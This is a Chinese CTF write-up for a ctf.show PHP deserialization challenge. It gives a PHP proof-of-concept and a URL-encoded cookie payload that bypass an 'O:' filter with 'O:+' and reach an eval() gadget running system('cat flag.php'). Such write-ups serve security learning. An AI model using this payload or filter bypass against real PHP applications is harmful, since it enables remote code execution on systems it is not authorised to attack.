整体来说和上一题差不多，但有几点差别：
一是类的属性从私有变成公有了（序列化结果里不再有 `\0` 包裹的属性名，这算是变简单了）；二是下面对 `O:` 做了过滤。过滤 `O:` 的话，就用 `O:+` 绕过：`unserialize()` 在解析类名长度时可以接受一个显式的正号，而过滤只匹配字面的 `O:`。注意该写法是否被接受取决于目标的 PHP 版本，利用前先确认。
POC
<?php
/**
 * Local mirror of the target's ctfShowUser class, used only to drive serialize().
 *
 * The property names and their declaration order are what matter: they fix the
 * layout of the serialized string. All properties are public, so no
 * "\0Class\0prop" private-name wrapping appears in the payload. The target is
 * presumably the one that acts on $class (e.g. calling getInfo() on it) - that
 * code is not shown on this page, so confirm against the challenge source.
 */
class ctfShowUser
{
    /** Placeholder credentials; the GET request on this page passes the same values. */
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';

    /** Left at its default for this chain. */
    public $isVip = false;

    /** Overwritten with a backDoor instance before serializing. */
    public $class = 'info';
}
/**
 * Local mirror of the target's backDoor gadget.
 *
 * Only the class name and the $code property are needed to produce the
 * serialized payload; getInfo() is reproduced for fidelity but this generator
 * never invokes it. On the target, getInfo() eval()s the attacker-supplied
 * $code, which is the code-execution sink this chain is built to reach.
 */
class backDoor
{
    /** PHP source text that getInfo() hands to eval(). */
    public $code;

    /**
     * SECURITY: eval() of an attacker-controlled string. Never call this with
     * untrusted $code outside of a deliberate test environment.
     */
    public function getInfo()
    {
        eval($this->code);
    }
}
// Assemble the chain: a ctfShowUser whose $class property carries a backDoor
// holding the PHP to run once the target reaches getInfo() on it.
$gadget = new backDoor();
$gadget->code = 'system("cat flag.php");';

$user = new ctfShowUser();
$user->class = $gadget;

// The target blacklists the literal "O:". unserialize() may still accept an
// explicit sign before the class-name length, so every "O:" is rewritten to
// "O:+" (and "C:" to "C:+" for symmetry - no C: token is produced here).
// Whether the "+" is accepted depends on the target's PHP version; confirm it.
// Note: this also rewrites any "O:" / "C:" that happens to occur inside a
// string value, which would corrupt the payload - fine for the strings used here.
// The printed form is raw; URL-encode it (the "+" must become %2B) before
// placing it in the cookie.
$payload = str_replace(['O:', 'C:'], ['O:+', 'C:+'], serialize($user));
echo $payload;
payload
get:
http://30e93501-8680-4bd1-8a76-7563d7f2cf57.challenge.ctf.show/?username=xxxxxx&password=xxxxxx
cookies（注意：`O:+` 里的 `+` 必须保持 URL 编码为 `%2B`，PHP 解析 Cookie 时会把原始的 `+` 解码成空格）:
user=O%3A%2B11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A0%3Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%22cat+flag.php%22%29%3B%22%3B%7D%7D